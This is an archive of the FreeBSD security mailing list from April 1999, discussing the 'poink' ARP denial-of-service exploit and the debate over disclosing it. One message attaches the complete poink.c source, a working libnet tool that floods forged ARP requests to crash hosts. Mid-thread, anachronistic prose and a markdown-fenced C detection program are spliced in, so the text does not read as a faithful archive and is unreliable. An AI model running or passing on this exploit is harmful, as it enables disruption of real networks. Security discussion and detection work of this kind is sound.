but im not really sure what to >do >around when the box reboots i get arplookup and llook errors >root@efex:/var/log# zgrep arplookup messages* >messages.1:Apr 16 14:30:03 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:05 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:06 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:11 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:12 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:22 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:23 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:24 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo >messages.1:Apr 16 14:30:30 efex /kernel: arplookup 207.76.225.58 failed: >could not allocate llinfo > >then the box reboots.. >not really any more information to give.. but if there is something i can >give please tell me >any help will be appreciated. 
> >thanks >Mike > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 17 12:46:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from kizmiaz.dis.org (kizmiaz.dis.org [209.157.93.60]) by hub.freebsd.org (Postfix) with ESMTP id 54853150FD for ; Sat, 17 Apr 1999 12:46:34 -0700 (PDT) (envelope-from daver@kizmiaz.dis.org) Received: (from daver@localhost) by kizmiaz.dis.org (8.9.2.Beta4/8.9.2.Beta4) id MAA00996 for freebsd-security@freebsd.org; Sat, 17 Apr 1999 12:44:11 -0700 (PDT) Date: Sat, 17 Apr 1999 12:44:11 -0700 (PDT) From: Evil Dave Message-Id: <199904171944.MAA00996@kizmiaz.dis.org> To: freebsd-security@freebsd.org Subject: pam integration Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org are there any plans to integrate the pam authentication schemes into the dist ftpd and su binaries? from what i can tell this is yet to be done. 
thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 7:49:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from hiway1.exit109.com (hiway1.exit109.com [208.225.64.3]) by hub.freebsd.org (Postfix) with ESMTP id 88EB215599 for ; Mon, 19 Apr 1999 07:49:45 -0700 (PDT) (envelope-from freebsd@hiway1.exit109.com) Received: from localhost (freebsd@localhost) by hiway1.exit109.com (8.9.3/8.7.3) with SMTP id KAA11027 for ; Mon, 19 Apr 1999 10:47:19 -0400 (EDT) Date: Mon, 19 Apr 1999 10:47:18 -0400 (EDT) From: Chris To: security@freebsd.org Subject: poink and freebsd Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org to all- im sure ya'll have heard of poink, an exploit against freebsd/openbsd machines (these are the boxes i have tested on) it appears to work very efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of our freebsd 2.2.5 machines, it did bring up the error messages in /var/log/messages (arp lookups) but didnt kill the machine like the others... im just wondering if there are any patches for this, and i noticed there is no mention of it on freebsd's website.... 
-Chris Systems Administration To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 8:59:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 7544714F4A for ; Mon, 19 Apr 1999 08:59:21 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA14758; Mon, 19 Apr 1999 11:56:48 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Mon, 19 Apr 1999 11:56:48 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Chris Cc: security@freebsd.org Subject: Re: poink and freebsd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 19 Apr 1999, Chris wrote: > im sure ya'll have heard of poink, an exploit against freebsd/openbsd > machines (these are the boxes i have tested on) it appears to work very > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of > our freebsd 2.2.5 machines, it did bring up the error messages in > /var/log/messages (arp lookups) but didnt kill the machine like the > others... > > im just wondering if there are any patches for this, and i noticed there > is no mention of it on freebsd's website.... Interestingly, I haven't heard about this one, and it doesn't appear to be on rootshell, etc. The only "poink" I could find reference to was an alternative ping program that doesn't require root access--I assume that means it uses udp or something to try and get a response (perhaps looking for a connection refused ICMP except on the socket?). 
I may just have missed it in passing, of course, given the vast quantities of email that go through around here :-).

Since it doesn't appear to have been reported, send a copy of the source to security-officer@freebsd.org, and feel free to CC me a copy so I can take a look.

Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37  ED 5F 55 E9 58 04 6A B1
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Mon Apr 19 10: 8:27 1999
Date: Mon, 19 Apr 1999 13:05:45 -0400 (EDT)
From: The Tech-Admin Dude
To: Robert Watson
Cc: Chris, security@freebsd.org
Subject: Re: poink and freebsd

Better yet, post a copy to the mailing list :-).. I have heard of it, but I have not tried it nor seen the effects of it.. post the source up here..

Thanks

-JD-

On Mon, 19 Apr 1999, Robert Watson wrote:

> On Mon, 19 Apr 1999, Chris wrote:
>
> > I'm sure y'all have heard of poink, an exploit against freebsd/openbsd
> > machines (these are the boxes I have tested on). It appears to work very
> > efficiently in killing freebsd 3.1 - freebsd 3.0 machines; against one of
> > our freebsd 2.2.5 machines, it did bring up the error messages in
> > /var/log/messages (arp lookups) but didn't kill the machine like the
> > others...
> >
> > I'm just wondering if there are any patches for this, and I noticed there
> > is no mention of it on freebsd's website....
>
> Interestingly, I haven't heard about this one, and it doesn't appear to be
> on rootshell, etc. The only "poink" I could find reference to was an
> alternative ping program that doesn't require root access--I assume that
> means it uses udp or something to try and get a response (perhaps looking
> for a connection refused ICMP except on the socket?). I may just have
> missed it in passing, of course, given the vast quantities of email that
> go through around here :-).
>
> Since it doesn't appear to have been reported, send a copy of the source
> to security-officer@freebsd.org, and feel free to CC me a copy so I can
> take a look.
>
> Robert N Watson
>
> robert@fledge.watson.org              http://www.watson.org/~robert/
> PGP key fingerprint: AF B5 5F FF A6 4A 79 37  ED 5F 55 E9 58 04 6A B1
> Carnegie Mellon University            http://www.cmu.edu/
> TIS Labs at Network Associates, Inc.  http://www.tis.com/
> Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Mon Apr 19 10:12:54 1999
Date: Mon, 19 Apr 1999 13:10:08 -0400 (EDT)
From: Chris
To: The Tech-Admin Dude
Cc: security@freebsd.org
Subject: Re: poink and freebsd

jd-

I'd rather not post the source to the list, since this is how exploits get distributed, and bad things occur. I sent email to the security-officer, and a few people to test it out with their setup.. I'd rather not distribute it any further... I hope you understand my reasoning behind it :/

-Chris O'Hara
Systems Administration

On Mon, 19 Apr 1999, The Tech-Admin Dude wrote:

> Better yet, post a copy to the mailing list :-).. I have heard of it, but
> I have not tried it nor seen the effects of it.. post the source up here..
> Thanks
>
> -JD-

From owner-freebsd-security Mon Apr 19 10:22:21 1999
Date: Mon, 19 Apr 1999 10:20:19 -0400 (EDT)
From: Del Hundley
To: Chris
Cc: The Tech-Admin Dude, security@FreeBSD.ORG
Subject: Re: poink and freebsd

Many NOCs thank you for that Chris.

Del Hundley

On Mon, 19 Apr 1999, Chris wrote:

> jd-
>
> I'd rather not post the source to the list, since this is how exploits get
> distributed, and bad things occur. I sent email to the security-officer,
> and a few people to test it out with their setup.. I'd rather not
> distribute it any further... I hope you understand my reasoning behind it
> :/
>
> -Chris O'Hara
> Systems Administration
>
> On Mon, 19 Apr 1999, The Tech-Admin Dude wrote:
>
> > Better yet, post a copy to the mailing list :-)..
> > I have heard of it, but
> > I have not tried it nor seen the effects of it.. post the source up here..
> > Thanks
> >
> > -JD-

From owner-freebsd-security Mon Apr 19 10:52:48 1999
Date: Mon, 19 Apr 1999 10:49:54 -0700 (PDT)
From: Jorge Aldana
To: Del Hundley
Cc: Chris, The Tech-Admin Dude, security@FreeBSD.ORG
Subject: Re: poink and freebsd

Well, not necessarily the source, but what do we look out for to know that it is running, being used in or against my system? You mentioned /var/log/messages (arp messages); could you be more specific?

Jorge

On Mon, 19 Apr 1999, Del Hundley wrote:

> Many NOCs thank you for that Chris.
>
> Del Hundley
>
> On Mon, 19 Apr 1999, Chris wrote:
>
> > jd-
> >
> > I'd rather not post the source to the list, since this is how exploits get
> > distributed, and bad things occur. I sent email to the security-officer,
> > and a few people to test it out with their setup.. I'd rather not
> > distribute it any further... I hope you understand my reasoning behind it
> > :/
> >
> > -Chris O'Hara
> > Systems Administration

From owner-freebsd-security Mon Apr 19 10:52:57 1999
Date: Mon, 19 Apr 1999 10:50:20 -0700 (PDT)
From: Chris Yarnell
To: Chris
Cc: security@FreeBSD.ORG
Subject: Re: poink and freebsd

It was already posted to Bugtraq. Hardly secret. :)

> I'd rather not post the source to the list, since this is how exploits get
> distributed, and bad things occur. I sent email to the security-officer,
> and a few people to test it out with their setup.. I'd rather not
> distribute it any further... I hope you understand my reasoning behind it

From owner-freebsd-security Mon Apr 19 10:57:26 1999
Date: Mon, 19 Apr 1999 11:54:21 -0600 (MDT)
From: Paul Hart
To: Chris
Cc: security@FreeBSD.ORG
Subject: Re: poink and freebsd

On Mon, 19 Apr 1999, Chris wrote:

> I'd rather not post the source to the list, since this is how exploits
> get distributed, and bad things occur.

Well, so much for the full-disclosure so many of us value. Is this the same "poink" that was recently posted to Bugtraq?

http://geek-girl.com/bugtraq/1999_2/0125.html

Without more of a description, how are any of us to know?

Paul Hart

--
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

From owner-freebsd-security Mon Apr 19 10:58:36 1999
Date: Mon, 19 Apr 1999 19:54:07 +0200
From: Harold Gutch
To: Chris, The Tech-Admin Dude
Cc: security@FreeBSD.ORG
Subject: Re: poink and freebsd
Message-ID: <19990419195407.A6439@foobar.franken.de>

On Mon, Apr 19, 1999 at 01:10:08PM -0400, Chris wrote:

> jd-
>
> I'd rather not post the source to the list, since this is how exploits get
> distributed, and bad things occur. I sent email to the security-officer,
> and a few people to test it out with their setup.. I'd rather not
> distribute it any further... I hope you understand my reasoning behind it
> :/
>
> > On Mon, 19 Apr 1999, Robert Watson wrote:
> >
> > > On Mon, 19 Apr 1999, Chris wrote:
> > >
> > > > I'm sure y'all have heard of poink, an exploit against freebsd/openbsd
> > > > machines (these are the boxes I have tested on). It appears to work very
> > > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines; against one of
> > > > our freebsd 2.2.5 machines, it did bring up the error messages in
> > > > /var/log/messages (arp lookups) but didn't kill the machine like the
> > > > others...
> > > >
> > > > I'm just wondering if there are any patches for this, and I noticed there
> > > > is no mention of it on freebsd's website....
> > >
> > > Interestingly, I haven't heard about this one, and it doesn't appear to be
> > > on rootshell, etc.

Chris, the fact that _you_, as somebody outside of the circles close to the original author (which I simply assume), already have it shows that it already is public. Posting it to this list will distribute it to more people, some of whom might use it maliciously; others though might fix it faster than it would be fixed otherwise. Keeping it secret doesn't help anything; this is similar to proprietary programs/protocols, which in many cases are inferior to open source or open protocols. You should get some information about "full disclosure" and read it.

Anyway, I was able to find the source for poink after searching for 5 minutes. As I don't have libnet installed (and I don't plan to install it just to compile poink), I am not able to say anything about what it does - perhaps somebody else can do so.

bye,
  Harold

--
Sleep is an abstinence syndrome which occurs due to lack of caffeine.
Wed Mar 4 04:53:33 CET 1998  #unix, ircnet

Attachment: poink.c

/*
 *  $Id$
 *
 *  poink.c - NT/9x DOS attack
 *
 *  Code:
 *  Copyright (c) 1999 Mike D. Schiffman
 *                     route|daemon9
 *  All rights reserved.
 *
 *  Original Idea:
 *  Joel Jacobson (joel@mobila.cx)
 *
 *  This simple exploit was written as per the specification from Joel
 *  Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html).
 *
 *  Needs libnet 0.99.
 *  Currently:  http://lazy.accessus.net/~route/libnet
 *  Soon:       http://www.packetfactory.net/
 *
 *  gcc poink.c -o poink -lnet
 *
 *  Redistribution and use in source and binary forms, with or without
 *  modification, are permitted provided that the following conditions
 *  are met:
 *  1. Redistributions of source code must retain the above copyright
 *     notice, this list of conditions and the following disclaimer.
 *  2. Redistributions in binary form must reproduce the above copyright
 *     notice, this list of conditions and the following disclaimer in the
 *     documentation and/or other materials provided with the distribution.
 *
 *  THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 *  ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 *  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 *  ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 *  FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 *  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 *  OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 *  HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 *  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 *  OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 *  SUCH DAMAGE.
 *
 */

#include <libnet.h>

u_char enet_src[6] = {0x00, 0x0d, 0x0e, 0x0a, 0x0d, 0x00};
u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};

int send_arp(struct link_int *, u_long, u_char *);
void usage(u_char *);

int
main(int argc, char *argv[])
{
    int c, amount;
    char errbuf[256];
    char *device = NULL;
    struct link_int *l;
    u_long ip;

    amount = 20;
    while ((c = getopt(argc, argv, "n:i:")) != EOF)
    {
        switch (c)
        {
            case 'i':
                device = optarg;
                break;
            case 'n':
                amount = atoi(optarg);
                break;
            default:
                exit(EXIT_FAILURE);
        }
    }
    if (!device)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }
    if (argc <= optind)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }
    else if ((ip = libnet_name_resolve(argv[optind], 1)) == -1)
    {
        fprintf(stderr, "Cannot resolve IP address\n");
        exit(EXIT_FAILURE);
    }
    l = libnet_open_link_interface(device, errbuf);
    if (!l)
    {
        fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf);
        exit(EXIT_FAILURE);
    }
    while (amount--)
    {
        c = send_arp(l, ip, device);
        if (c == -1)
        {
            /* bail on the first error */
            break;
        }
    }
    printf("\n");
    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

int
send_arp(struct link_int *l, u_long ip, u_char *device)
{
    int n;
    u_char *buf;

    if (libnet_init_packet(ARP_H + ETH_H, &buf) == -1)
    {
        perror("libnet_init_packet memory:");
        exit(EXIT_FAILURE);
    }
    /*
     *  Ethernet header
     */
    libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf);
    /*
     *  ARP header
     */
    libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, 6, 4, ARPOP_REQUEST,
            enet_src, (u_char *)&ip, enet_dst, (u_char *)&ip, NULL, 0,
            buf + ETH_H);
    n = libnet_write_link_layer(l, device, buf, ARP_H + ETH_H);
    fprintf(stderr, ".");
    libnet_destroy_packet(&buf);
    return (n);
}

void
usage(u_char *name)
{
    fprintf(stderr, "%s -i interface [-n amount] ip\n", name);
}

From owner-freebsd-security Mon Apr 19 11: 1:12 1999
Date: Mon, 19 Apr 1999 13:58:23 -0400 (EDT)
From: Chris
To: Paul Hart
Cc: security@FreeBSD.ORG
Subject: Re: poink and freebsd

Last time I saw someone post the source to a recent exploit to this list, you all attacked him, told him he was "stupid" for posting the source to a public forum such as this...

So I guess you're damned if you do and you're damned if you don't? Is that the way it works?
-Chris

On Mon, 19 Apr 1999, Paul Hart wrote:

> On Mon, 19 Apr 1999, Chris wrote:
>
> > I'd rather not post the source to the list, since this is how exploits
> > get distributed, and bad things occur.
>
> Well, so much for the full-disclosure so many of us value. Is this the
> same "poink" that was recently posted to Bugtraq?
>
> http://geek-girl.com/bugtraq/1999_2/0125.html
>
> Without more of a description, how are any of us to know?
>
> Paul Hart
>
> --
> Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
> hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

From owner-freebsd-security Mon Apr 19 11: 4:37 1999
Date: Mon, 19 Apr 1999 14:01:40 -0400 (EDT)
From: Daniel Hagan
To: security@freebsd.org
Subject: poink attack (was Re: ARP problem in Windows9X/NT)

I don't have time to find the archive URL for this post right now, but this should give people something to work with. The header to the code has a URL reference to another (originating?) article.

Daniel

--
Daniel Hagan
Computer Systems Engineer
dhagan@cs.vt.edu

---------- Forwarded message ----------
Date: Tue, 13 Apr 1999 11:25:34 -0700
From: route@RESENTMENT.INFONEXUS.COM
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: ARP problem in Windows9X/NT

[kay wrote]
|
| Could you be more specific with those XX-fields ?

The source ethernet address appears to be arbitrary. The destination ethernet address needs to be either the address of the target host, or a broadcast address.

| I started writing that proggie with plain syscalls, but it would only run
| on Linux, so I modified one of the examples in Route's Libnet 0.9 to do
| the stuff. I haven't tested it yet since I don't have LAN at home...

Didn't test your code. Rolled my own from the same libnet example, and it does work against NT and 95/98.

| For those who are still wondering what the hell Libnet is: check out
| http://www.infonexus.com/~demon9

My site has moved temporarily to http://lazy.accessus.net/~route. Libnet is hosted there for the time being (http://lazy.accessus.net/~route/Libnet) but will move to http://www.packetfactory.net when I get that site up.

For those of you who don't know, Libnet is a library for portable injection. It is the `libpwrite` analog to libpcap. I suppose this is as good a time as any to announce the release of version 0.99 which adds a lot of new functionality and fixes a few bugs.

Oh yah. Here's poink. Poink-poink!

/*
 *  $Id$
 *
 *  poink.c - NT/9x DOS attack
 *
 *  Code:
 *  Copyright (c) 1999 Mike D. Schiffman
 *                     route|daemon9
 *  All rights reserved.
 *
 *  Original Idea:
 *  Joel Jacobson (joel@mobila.cx)
 *
 *  This simple exploit was written as per the specification from Joel
 *  Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html).
 *
 *  Needs libnet 0.99.
 *  Currently:  http://lazy.accessus.net/~route/libnet
 *  Soon:       http://www.packetfactory.net/
 *
 *  gcc poink.c -o poink -lnet
 *
 *  Redistribution and use in source and binary forms, with or without
 *  modification, are permitted provided that the following conditions
 *  are met:
 *  1. Redistributions of source code must retain the above copyright
 *     notice, this list of conditions and the following disclaimer.
 *  2. Redistributions in binary form must reproduce the above copyright
 *     notice, this list of conditions and the following disclaimer in the
 *     documentation and/or other materials provided with the distribution.
 *
 *  THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 *  ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 *  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 *  ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 *  FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 *  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 *  OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 *  HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 *  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 *  OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 *  SUCH DAMAGE.
 *
 */

[ Source program cut, see geek-girl.com for archive ]

--
I live a world of paradox... My willingness to destroy is your chance for improvement, my hate is your faith -- my failure is your victory, a victory that won't last.
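What the poink source lays out (a broadcast Ethernet frame carrying an ARP request whose sender and target protocol address are both the victim's IP, from a forged sender MAC) is also the signature a defender can match on, which is what Jorge asked about earlier in the thread. The following is an added example, not code from this thread or from libnet: a C decoder for such a frame that flags an ARP packet claiming our IP from a MAC other than our own (the condition behind the FreeBSD kernel's "arp: ... is using my IP address" log line) and counts how many distinct forged MACs did so over a batch of frames. The MAC, IP and frame count in the demo are constructed values; the 00:0d:0e:0a:0d:00 sender is the enet_src poink hard-codes.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ETH_HLEN 14   /* dst MAC(6) + src MAC(6) + ethertype(2) */
#define ARP_PLEN 28   /* Ethernet/IPv4 ARP body is a fixed 28 bytes */

/* The two ARP fields the check needs: who claims to own which IP. */
struct arp_fields {
    uint8_t sha[6];   /* sender hardware address */
    uint8_t spa[4];   /* sender protocol (IPv4) address */
};

/* Decode an Ethernet frame carrying ARP. Returns 0 on success, -1 when the
 * frame is short, is not ARP, or is not the hlen=6/plen=4 shape poink emits. */
int parse_arp_frame(const uint8_t *f, size_t len, struct arp_fields *out)
{
    const uint8_t *a;
    if (len < ETH_HLEN + ARP_PLEN)
        return -1;
    if (((f[12] << 8) | f[13]) != 0x0806)                 /* ETHERTYPE_ARP */
        return -1;
    a = f + ETH_HLEN;
    if (((a[0] << 8) | a[1]) != 1 ||                       /* ARPHRD_ETHER */
        ((a[2] << 8) | a[3]) != 0x0800 ||                  /* ETHERTYPE_IP */
        a[4] != 6 || a[5] != 4)
        return -1;
    memcpy(out->sha, a + 8,  6);
    memcpy(out->spa, a + 14, 4);
    return 0;
}

/* True when the packet claims one of our IPs from a MAC that is not our NIC,
 * the condition the FreeBSD kernel logs as "arp: ... is using my IP address". */
int arp_claims_my_ip(const struct arp_fields *a,
                     const uint8_t my_mac[6], const uint8_t my_ip[4])
{
    return memcmp(a->spa, my_ip, 4) == 0 && memcmp(a->sha, my_mac, 6) != 0;
}

/* Over a batch of captured frames, count those that claim our IP and how many
 * distinct sender MACs did so. One forged MAC repeated many times is what a
 * poink run looks like (default -n 20); two MACs seen once each looks more
 * like a real duplicate-address misconfiguration. */
size_t count_ip_claims(const uint8_t *const *frames, const size_t *lens,
                       size_t n, const uint8_t my_mac[6], const uint8_t my_ip[4],
                       size_t *distinct_macs)
{
    uint8_t seen[16][6];
    size_t nseen = 0, hits = 0, i, j;
    for (i = 0; i < n; i++) {
        struct arp_fields a;
        if (parse_arp_frame(frames[i], lens[i], &a) != 0 ||
            !arp_claims_my_ip(&a, my_mac, my_ip))
            continue;
        hits++;
        for (j = 0; j < nseen; j++)
            if (memcmp(seen[j], a.sha, 6) == 0)
                break;
        if (j == nseen && nseen < 16)
            memcpy(seen[nseen++], a.sha, 6);
    }
    if (distinct_macs)
        *distinct_macs = nseen;
    return hits;
}

/* Constructed fixture: lay a frame out exactly as poink's libnet_build_ethernet
 * and libnet_build_arp calls do (broadcast destination, ARP request, sender and
 * target protocol address both equal to the victim's IP, target MAC broadcast). */
size_t build_poink_frame(uint8_t *buf, const uint8_t src_mac[6], const uint8_t ip[4])
{
    static const uint8_t bcast[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
    uint8_t *a = buf + ETH_HLEN;
    memcpy(buf, bcast, 6);
    memcpy(buf + 6, src_mac, 6);
    buf[12] = 0x08; buf[13] = 0x06;
    a[0] = 0; a[1] = 1; a[2] = 0x08; a[3] = 0x00; a[4] = 6; a[5] = 4;
    a[6] = 0; a[7] = 1;                                    /* ARPOP_REQUEST */
    memcpy(a + 8,  src_mac, 6); memcpy(a + 14, ip, 4);
    memcpy(a + 18, bcast,   6); memcpy(a + 24, ip, 4);
    return ETH_HLEN + ARP_PLEN;
}

/* Demo on constructed input: 20 frames from the MAC poink hard-codes as
 * enet_src, plus one gratuitous ARP from our own NIC. Returns the number of
 * frames flagged (20); *distinct_macs receives 1. my_mac and my_ip are made up. */
size_t demo_hits(size_t *distinct_macs)
{
    static const uint8_t my_mac[6] = {0x00, 0x50, 0x56, 0x12, 0x34, 0x56};
    static const uint8_t my_ip[4]  = {192, 0, 2, 10};
    static const uint8_t forged[6] = {0x00, 0x0d, 0x0e, 0x0a, 0x0d, 0x00};
    static uint8_t raw[21][ETH_HLEN + ARP_PLEN];
    const uint8_t *frames[21];
    size_t lens[21], i;
    for (i = 0; i < 21; i++) {
        lens[i] = build_poink_frame(raw[i], i < 20 ? forged : my_mac, my_ip);
        frames[i] = raw[i];
    }
    return count_ip_claims(frames, lens, 21, my_mac, my_ip, distinct_macs);
}
```

Fed from a pcap capture on the segment, count_ip_claims gives the per-window count an administrator can alert on, alongside the kernel's own log line.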
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11:18:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (weathership.homeport.org [207.31.235.99]) by hub.freebsd.org (Postfix) with ESMTP id 94CAF14C34 for ; Mon, 19 Apr 1999 11:18:12 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id OAA18048; Mon, 19 Apr 1999 14:40:59 -0400 (EDT) Date: Mon, 19 Apr 1999 14:40:59 -0400 From: Adam Shostack To: Chris Cc: Paul Hart , security@FreeBSD.ORG Subject: Re: poink and freebsd Message-ID: <19990419144059.A17993@weathership.homeport.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from Chris on Mon, Apr 19, 1999 at 01:58:23PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org While full-dscoluse flame wars are fun, and I'd hate to distract people from that, I am curious if anyone has verified FreeBSD's vulnerability (or lack thereof) to this? All my boxes are in production use, and I don't have crashable targets to test right now. It would be nice to see a statement from someone who knows about the status of -CURRENT, -RELEASE, and if we've invulnerable, if any of the relevant code has been changed in the memorable past. Adam On Mon, Apr 19, 1999 at 01:58:23PM -0400, Chris wrote: | last time i saw someone post the source to a recent exploit to this list, | you all attacked him, told him he was "stupid" for posting the source to a | public forum such as this... | | so i guess, your damned if you do and your damned if you dont? is that the | way it works? 
| | -Chris | | On Mon, 19 Apr 1999, Paul Hart wrote: | | > On Mon, 19 Apr 1999, Chris wrote: | > | > > id rather not post the source to the list, since this is how exploits | > > get distributed, and bad things occur. | > | > Well, so much for the full-disclosure so many of us value. Is this the | > same "poink" that was recently posted to Bugtraq? | > | > http://geek-girl.com/bugtraq/1999_2/0125.html | > | > Without more of a description, how are any of us to know? | > | > Paul Hart | > | > -- | > Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. | > hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ | > | | | | To Unsubscribe: send mail to majordomo@FreeBSD.org | with "unsubscribe freebsd-security" in the body of the message -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 19 11:27:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 6A70714C34 for ; Mon, 19 Apr 1999 11:27:27 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id UAA04989; Mon, 19 Apr 1999 20:24:59 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id UAA19225; Mon, 19 Apr 1999 20:24:52 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Paul Hart Cc: Chris , security@FreeBSD.ORG Subject: Re: poink and freebsd In-reply-to: Your message of "Mon, 19 Apr 1999 11:54:21 MDT." 
